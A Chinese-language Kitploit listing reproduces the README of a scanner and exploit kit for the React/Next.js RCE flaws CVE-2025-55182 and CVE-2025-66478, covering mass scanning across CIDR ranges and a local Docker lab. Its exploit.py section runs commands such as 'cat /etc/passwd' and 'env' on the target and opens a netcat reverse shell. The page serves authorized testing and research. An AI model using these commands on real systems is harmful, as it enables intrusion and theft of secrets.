Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
工具/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
危害指标 (IOC) 管理漏洞扫描器漏洞利用Web应用程序漏洞利用威胁情报子域名枚举学习与教育Payload 开发实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

查看仓库
28个月前尚未审核

React2Shell Enterprise Scanner

用于 CVE-2025-55182 和 CVE-2025-66478 的高保真漏洞扫描器——React Server Components / Next.js 中的远程代码执行漏洞。

📖 如需详细技术分析、漏洞利用机制和 IOC 数据,请参阅 SECURITY-RESEARCH.md


⚠️ 免责声明

本工具仅供教育和授权安全测试目的使用。 未经授权访问计算机系统是非法的。仅在你拥有或获得明确书面许可的系统上使用这些工具。作者不对滥用行为承担任何责任。


🚨 漏洞概述

CVE描述CVSS
CVE-2025-55182React Server Components 不安全反序列化 RCE9.8 严重
CVE-2025-66478Next.js Server Actions RCE9.8 严重

受影响包:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

修复版本:

  • 19.0.1, 19.1.2, 19.2.1(针对所有包)

✨ 功能特性

  • 多目标输入:单个 URL、主机文件、CIDR 范围、IP 范围
  • 子域名枚举:自动发现子域名
  • 技术指纹识别:在测试前检测 Next.js
  • 安全检测模式:无需执行代码的侧信道检测
  • RCE 验证:基于算术运算的验证概念
  • IOC 关联:对照已知恶意基础设施进行检查
  • Phoenix Security 集成:将发现结果上传至 Phoenix 平台
  • 并发扫描:多线程支持大规模扫描

📦 安装

使用 uv(推荐)

root@kitploit:~
# 无需安装 - uv 自动处理依赖
uv run react2shell-scanner -u https://example.com

使用 pip

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 用法

基本扫描

root@kitploit:~
# 单个 URL
python3 react2shell-scanner -u https://example.com

# 安全模式(不执行 RCE)
python3 react2shell-scanner -u https://example.com --safe-check

# 从主机文件扫描
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR 范围
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# 多个 CIDR 范围
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

高级扫描

root@kitploit:~
# 子域名枚举
python3 react2shell-scanner -u example.com --enumerate-subdomains

# 自定义子域名字典
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# 自定义路径
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# 跳过指纹识别(扫描所有)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# 详细输出并禁用 SSL
python3 react2shell-scanner -u https://example.com -k -v

Phoenix Security 集成

root@kitploit:~
# 将结果上传至 Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# 调试模式(保存 payload)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# 上传所有结果(不仅仅是漏洞)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 配置

Phoenix Security 配置

创建 .phoenix.config 文件:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

或使用环境变量:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 测试实验室

附带基于 Docker 的测试环境。快速参考请参见 Lab-instructions-sample.md。

root@kitploit:~
# 启动实验室
cd test-lab/lab
docker-compose up -d

# 服务:
# - 易受攻击实例:http://localhost:3011
# - 已修复实例:   http://localhost:3012

# 测试易受攻击实例(安全证据收集)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# 测试已修复实例
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# 运行完整演示
./test-and-demo.sh --full-demo

⚠️ 注意: 利用命令(例如 exploit.py -c "whoami")会触发实际的 RCE。仅用于研究目的,在本地 Docker 容器上使用。

💻 漏洞利用工具 (exploit.py)

在易受攻击的目标上执行命令。需要 Python 3.11+

安装

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# 或:pip3.11 install rich-click fake-useragent rich requests

命令执行示例

root@kitploit:~
# 基本命令执行
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# 输出:nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# 输出:uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# 输出:99e28775bf80(容器 ID)

# 系统枚举
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# 应用侦察
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# 输出:/app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# 网络信息
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# 进程枚举
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

反弹 Shell(高级)

root@kitploit:~
# 获取 Docker 网络网关
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# 启动监听器(另一个终端)
nc -lvnp 4444

# 发起反弹 shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# 可选的 payload 类型:nc, nc-mkfifo, sh, bash, perl

利用选项

📊 输出格式

控制台输出

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

JSON 输出

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 IOC 关联

扫描器包含来自活跃攻击活动的已知入侵指标:

  • 32 个恶意 IP 来自 payloads-exploits/iocs.csv
  • 武器化 payload 来自 payloads-exploits/weaponized-payloads
  • 扩展 IOC 包括域名、URL、文件哈希和加密货币钱包,位于 payloads-exploits/iocs_patterns.csv

检测到的 IOC 匹配将被标记为高严重性。

IOC 文件

文件内容
iocs.csv32 个已知恶意 IP 及地理位置数据
iocs_patterns.csv扩展 IOC:C2 域名、投递器 URL、恶意软件哈希、Monero 钱包

🛡️ 检测方法

安全侧信道检查(--safe-check)

  • 发送导致错误响应的畸形 payload
  • 不在目标上执行代码
  • 检测目标是否存在易受攻击的反序列化
  • 推荐用于被动侦察

RCE 算术运算检查(默认)

  • 发送执行 echo $((41*271)) 的 payload
  • 验证响应是否包含计算结果 (11111)
  • 确认实际的代码执行能力
  • 仅用于授权目标

📁 项目结构

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # 主扫描脚本
├── cve-2025-66478-web-scan     # 原始扫描器参考
├── nuclei-rules                 # Nuclei 模板
├── test-and-demo.sh            # 测试自动化脚本
├── README.md                    # 本文件
├── SECURITY-RESEARCH.md         # 详细技术分析
├── Lab-instructions-sample.md   # 快速实验室测试指南
├── payloads-exploits/
│   ├── iocs.csv                 # 已知恶意 IP
│   ├── iocs_patterns.csv        # 扩展 IOC(域名、URL、哈希)
│   ├── weaponized-payloads      # 真实世界攻击 payload
│   └── exploit-2025-55182       # 原始 HTTP 漏洞利用请求
└── test-lab/
    ├── exploit.py               # 利用工具
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # 易受攻击的 Next.js 应用
    │   └── patched/             # 已修复的 Next.js 应用
    └── packages/
        ├── vulnerable/          # 易受攻击的 npm 包
        └── patched/             # 已修复的 npm 包

🔗 相关仓库

仓库用途
react2shell-scanner-CVE-2025-55182实验室、扫描器和漏洞利用(本仓库)
react2shell-scanner-rce-react-next带 Web 界面的完整扫描器

⚠️ 法律免责声明

本工具仅供授权安全测试使用。在扫描任何目标之前,你必须获得明确的书面许可。未经授权的扫描可能违反计算机犯罪法律。

负责任地使用:

  • 仅扫描你拥有或已获授权测试的系统
  • 记录你的授权
  • 通过适当渠道报告漏洞
  • 遵循负责任的披露实践

📚 参考

  • CVE-2025-55182 安全公告
  • React 安全博客
  • Next.js 安全公告 GHSA-9qr9-h5gf-34mp
  • Vercel 更新日志
  • Assetnote 研究

🙏 致谢

  • Assetnote 安全研究团队 - 原始漏洞研究
  • Chocapikk - 漏洞利用开发
  • Phoenix Security - 平台集成

由致力于使网络更安全的安全研究人员提供。

下载工具
选项描述
-u, --url目标 URL(必需)
-c, --cmd要执行的命令
-r, --reverse启用反弹 shell 模式
-l, --lhost反弹 shell 的监听主机
-p, --lport反弹 shell 的监听端口
-P, --payloadPayload 类型:nc、nc-mkfifo、sh、bash、perl
--timeout请求超时时间(默认:10 秒)
weaponized-payloads
在实际攻击活动中观察到的真实攻击 payload
exploit-2025-55182漏洞利用的原始 HTTP 请求格式